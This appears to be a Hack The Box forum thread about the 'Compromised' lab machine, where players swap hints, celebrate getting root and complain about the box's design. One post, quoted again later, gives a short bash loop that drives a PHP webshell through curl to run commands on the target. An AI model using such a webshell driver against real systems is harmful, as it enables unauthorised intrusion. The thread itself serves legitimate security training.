Official Compromised Discussion

I discovered a .sh***p file in the downloaded archive. However when opening it in browser it gives a blank page and with curl I get a 404. It’s a rabbit hole I guess, or is it not?

Ok, have RCE, but not reverse shell. I would appreciate hint or some sake where I lost it.

@solid5n4k3 said:

Ok, have RCE, but not reverse shell. I would appreciate hint or some sake where I lost it.

The box can be done without having a reverse shell.
If you have RCE and not just P** CE, you can assume that something is blocking you from getting one.

Spoiler Removed

Type your comment> @sparkla said:

Once you got rce, here’s a little script you can use. It’s almost like a real shell :smiley:
(Your script must support a get param named cmd)

#!/bin/bash

cmd=''
while [[ $cmd != 'exit' ]];
do
        read -p '$ > ' cmd
        curl -G http://compromised.htb/findThePathYourself/your-cmd-shell.php --data-urlencode "cmd=$cmd"
done

Thank you

Got root. Needed a few nudges for root but got there in the end. If you need help let me know

I finally managed to get command execution, with a very limited shell. Don’t quite know where to go from here…

Rooted. What a ride.

Thank you @D4nch3n for a fun box. The hardest part for me was getting the first user. Once I figured out what things were “left behind” I was able to progress quicker.

User->root was very nifty. I definitely went down more than a couple of rabbit holes before I figured out where the attackers had left their calling card.

Type your comment> @zilwah said:

Spoiler Removed

why ?? this was a simple *nix command not specifically related to any machine, vuln or exploit ?

For anyone feeling lost in the bac**p files, what made it super easy for me is to think which files were modified when and keep your eyes peeled. Could shave some time off of your file-diving :wink:

Finally rooted. This one requires you to take care with your enumeration. I needed two nudges for user that I wouldn’t have if I had been more thorough and thoughtful.

My only other piece of advice is to practice your file searching tools (grep, find, etc). They will help you a lot. I agree with @HumanFlyBzzzz

PM me if you need nudges. Let me know what you’ve tried so I don’t spoil anything.

Accidentally reset my entire desktop and panels while messing around waiting for nmap to finish. Spent the last 45 min trying to get everything fixed. Can finally start this box now

I have grepped everything in existence where tf is this thing… I know you’re somewhere…

Edit: can someone give me a nudge? I seriously can’t find this

Edit 2: I was using the IP for feline the entire time *facepalm*

The shell script from @sparkla is very cool once you get a working webshell. Feels like a real shell, including proper formatting.

Stuck moving forward from here though.

Update: Moved forward, thanks to some nudges from @GPLO and @metuldann. Learned a new technique. Now on to the next user.

Update 2: Managed to get the user flag. Now trying for root. So far haven’t found anything “left behind” which can help me - any advice about where to look would be appreciated.

Found something. Now just need to make it work.

Finally got root. The last part is very cool. Thanks @D4nch3n for a great box - I learned a lot.

Type your comment> @sparkla said:

Again I decided against knowing better to try & move forward from the pseudo-shell to my user. I had some “fun” but still unable to make anything out of it.

My initial prediction remained true, whatever is supposed to work here seems to work only in a very specific way, you’re either lucky enough to find it or you aren’t - for me this has little to do with hacking.

Many hours wasted, learned nothing new, not the type of box I like to play here. Trollbox, Guessbox, Mysterybox, whatever you wanna call it. Not a Hackbox.

aren’t half the boxes like this anyway?
I thought it was a good box. some known vulns, some adapted vulns etc.
It’s all learning!!
Must say couldn’t have rooted without help though!

Type your comment> @sparkla said:

Again, first blood happened like nothing was wrong, the missing link was spread through forum messages, probably initiated by the creator. I asked “why” we’re having to endure such frustrating experiences and never got a real answer. That’s what I call a Trollbox. Creators intentionally trolling players or not telling the reason why they do it.

I’ve had this feeling since quite a while, that first blood has become a total BSh.t. Creators, moderators, other HTB staff, their friends and friends of friends. This is how it looks like and works. This is a commercial project in many aspects (not only the simple and straightforward) and owners apparently think that this way is the best one. You just need to filter out what has value from a total garbage, forget about first blood and I can guarantee you that you will feel way better immediately.

Anyone else getting an unresponsive webshell?

nvm

When I upload a file with the vq*** , the web interface crashes… but I’m still able to do some directory browsing on the website … is that behavior intended ?

Please stop uploading files it crashes the server and has nothing to do with the exploit